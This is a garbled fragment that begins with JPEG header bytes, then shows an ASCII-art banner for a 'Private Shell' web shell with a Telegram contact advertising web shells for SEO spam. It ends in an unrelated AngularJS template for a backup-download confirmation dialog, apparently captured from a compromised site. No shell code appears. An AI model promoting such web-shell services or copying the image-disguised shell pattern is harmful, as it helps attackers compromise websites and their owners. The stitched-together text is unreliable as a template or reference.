����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="form-group">
<p ng-if="type == 'backup' && config.limit_downloads && !isDirectories">{{ lang.t("Note that there's a limit of %s downloads per account. Older downloads may be deleted. Are you sure you want to download this backup?", config.limit_downloads) }}</p>
<p ng-if="type != 'backup' || !config.limit_downloads || isDirectories">{{ lang.t("Are you sure you want to download this backup?") }}</p>
</div>
<div class="form-group">
<button
id="backup_table_download_confirm_{{$index}}"
type="submit"
class="btn btn-primary"
ng-click="onClickDownloadConfirm()">{{ lang.t("Download") }}</button>
<button class="btn btn-link" ng-click="cancelAction()" ng-class="{ 'hide': downloadingBackup }">{{ lang.t("Cancel") }}</button>
</div>
<div id="download_backup_status_{{index}}"></div>